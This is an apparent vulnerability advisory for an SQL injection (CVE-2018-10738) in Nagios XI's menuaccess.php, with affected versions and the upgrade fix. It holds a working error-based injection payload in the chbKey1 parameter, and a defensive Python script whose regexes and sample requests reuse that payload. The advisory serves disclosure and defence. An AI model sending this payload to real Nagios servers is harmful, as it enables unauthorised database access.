### Nagios XI <= 5.4.12 menuaccess.php SQL injection (CVE-2018-10738)

#### Description

A SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1 parameter.

#### Affected Version

* Nagios XI 5.2.x
* Nagios XI 5.4.x before 5.4.13

#### Proof of concept

```
http://xxxx/nagiosql/admin/menuaccess.php
chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1
```

![](https://images.seebug.org/1525859270765-w331s)

#### Fix

Upgrade to version 5.4.13.
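A defensive check for the request shape shown in the proof of concept, as an added example (not code from Nagios XI or from the original advisory): it decodes `chbKey*` parameters sent to `admin/menuaccess.php` and flags values that are not a plain token. The allowlist pattern, the `chbKey` prefix match, the host `nagios.example` and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote_plus, urlsplit

TARGET_PATH = "/admin/menuaccess.php"  # endpoint named in the advisory
PARAM_PREFIX = "chbKey"                # assumption: sibling chbKeyN fields are checked too
# Assumption: a legitimate value is a short plain token; adjust to your install.
BENIGN_VALUE = re.compile(r"[A-Za-z0-9_-]{0,32}")
# MySQL error-based functions plus generic SQL keywords and metacharacters.
SQLI_HINTS = re.compile(
    r"updatexml|extractvalue|concat\s*\(|\bunion\b|\bselect\b|\bor\b|['\"#;]|--|/\*",
    re.IGNORECASE,
)

def inspect_request(url, body=""):
    """Return (param, decoded_value, reason) findings for one HTTP request."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(TARGET_PATH):
        return []
    findings = []
    for source in (parts.query, body):  # query string and form body
        # parse_qs percent-decodes, so encoded payloads are matched in clear form
        for name, values in parse_qs(source, keep_blank_values=True).items():
            if not name.startswith(PARAM_PREFIX):
                continue
            for value in values:
                if BENIGN_VALUE.fullmatch(value):
                    continue
                reason = "sql-pattern" if SQLI_HINTS.search(value) else "unexpected-chars"
                findings.append((name, value, reason))
    return findings

POC_VALUE = "' or updatexml(2,concat(0x7e,(version())),0) or''#"  # value from the PoC
BASE = "http://nagios.example/nagiosql/admin/"  # constructed host
SAMPLES = [  # constructed requests: (url, form body)
    (BASE + "menuaccess.php", "chbKey1=" + quote_plus(POC_VALUE) + "&selSubMenu=1&subSave=1"),
    (BASE + "menuaccess.php", "chbKey1=1&selSubMenu=1&subSave=1"),
    (BASE + "menuaccess.php", "chbKey2=1+2&subSave=1"),
    (BASE + "other.php", "chbKey1=%27"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, inspect_request(url, body) or "clean")
```

A check like this is a stopgap for log review or a reverse-proxy filter on hosts that cannot yet be upgraded; the fix remains the upgrade to 5.4.13.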
